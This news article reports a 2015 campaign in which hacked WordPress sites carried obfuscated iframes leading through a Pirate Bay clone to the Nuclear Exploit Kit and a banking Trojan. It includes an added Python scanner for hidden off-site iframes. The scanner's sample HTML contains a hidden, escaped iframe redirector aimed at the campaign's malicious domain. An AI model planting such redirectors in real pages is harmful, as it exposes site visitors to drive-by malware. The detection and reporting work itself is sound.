Nuclear EK leverages Flash flaw against outdated browsers

Apr 1, 2015 23:03 GMT  ·  By

Several websites running WordPress have been injected with malicious code that redirects visitors to a fake Pirate Bay website, exposing them to drive-by attacks aimed at delivering a banking Trojan.

The iframe on the compromised sites does not look suspicious to the user, but it contains an obfuscated string that points to thepiratebay[.]in[.]ua, a clone of the famous torrent site, where another iframe leads to Nuclear Exploit Kit (EK).
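As an added illustration, not code from the article or from Malwarebytes, the following scanner looks for the injected-iframe pattern described above: it decodes the string escapes such redirectors usually hide behind, then flags iframes pointing off-site, marking those that are also hidden. The sample page, the allowlist and the escape scheme are constructed assumptions; only the destination domain is the one the article names.

```python
import re
from html import unescape
from urllib.parse import urlparse

# Constructed sample of an injected WordPress page (not taken from the article):
# one legitimate embed plus a hidden iframe written out from an escaped string,
# which is how injected redirectors commonly evade a casual look at the source.
SAMPLE_HTML = r"""
<html><body>
<p>Welcome to my blog</p>
<iframe src="https://www.youtube.com/embed/abc" width="560"></iframe>
<script>document.write("\x3ciframe src=\x22http://thepiratebay.in.ua/landing.php\x22 width=1 height=1 style=\x22visibility:hidden\x22\x3e\x3c/iframe\x3e");</script>
</body></html>
"""

# Hosts this site legitimately embeds (assumed allowlist); anything else is suspect.
ALLOWED_HOSTS = {"www.youtube.com"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*\bsrc=[\"']?([^\"'\s>]+)", re.I)
HIDDEN_RE = re.compile(r"width=[\"']?[01]\b|height=[\"']?[01]\b|visibility:\s*hidden|display:\s*none", re.I)

def deobfuscate(text):
    """Decode \\xNN, \\uNNNN, %NN escapes and HTML entities so an iframe
    assembled by a script becomes visible to the tag regex."""
    hexchar = lambda m: chr(int(m.group(1), 16))
    text = re.sub(r"\\x([0-9a-fA-F]{2})", hexchar, text)
    text = re.sub(r"\\u([0-9a-fA-F]{4})", hexchar, text)
    text = re.sub(r"%([0-9a-fA-F]{2})", hexchar, text)
    return unescape(text)

def host_of(src):
    """Hostname of an iframe src; None for relative (same-site) paths."""
    if src.startswith("//"):
        src = "http:" + src          # protocol-relative URL
    elif "://" not in src:
        return None
    return urlparse(src).hostname

def find_suspicious_iframes(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (src, hidden, was_obfuscated) for every iframe pointing off-site."""
    findings = []
    for obfuscated, text in ((False, html), (True, deobfuscate(html))):
        for m in IFRAME_RE.finditer(text):
            src = m.group(1)
            host = host_of(src)
            if host is None or host in allowed_hosts:
                continue
            tag = text[m.start(): text.find(">", m.end()) + 1]
            finding = (src, bool(HIDDEN_RE.search(tag)), obfuscated)
            if finding[:2] not in [f[:2] for f in findings]:   # second pass repeats plain ones
                findings.append(finding)
    return findings

if __name__ == "__main__":
    for src, hidden, obf in find_suspicious_iframes(SAMPLE_HTML):
        print(f"off-site iframe -> {src} hidden={hidden} obfuscated={obf}")
```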

Payload is not widely known to antivirus products

The warning comes from security company Malwarebytes, which identified the same malicious iframe on multiple websites and says the attack may be substantial.

Researchers have determined that the browser-based attack tool leverages a vulnerability (CVE-2015-0311) affecting outdated versions of Flash (16.0.0.287 and earlier).

If the victim’s browser runs with an unpatched Flash, then the EK serves the exploit that facilitates the download of the payload.

The malware, detected by Malwarebytes as Trojan.Agent.ED, has a relatively low detection rate: only 9 out of 56 antivirus engines on VirusTotal flag it.

Attacks believed to be connected to a previous operation

The researchers say that the threat is instructed to contact a command and control (C&C) server whose domain is in the Russian TLD space (usabrent[.]ru).

The method the perpetrators used to infect the websites is not clear, but a common attack vector is a vulnerable WordPress component, such as a theme or plug-in.

Malwarebytes suspects that the current operation may be related to an incident from last year involving the RevSlider plug-in, when more than 100,000 websites were affected. That campaign was dubbed SoakSoak.

“To avoid getting their sites hacked, WordPress users need to check that they are running the latest WP install and that all their plugins are up to date. Other proper hygiene tips such as strong passwords and avoiding public wifi when logging into your site should also be applied,” Jerome Segura, senior security researcher at Malwarebytes, recommends.

[Image: iframe directing to Nuclear Exploit Kit landing page]
[Image: Pirate Bay clone sending visitors to Nuclear EK landing page]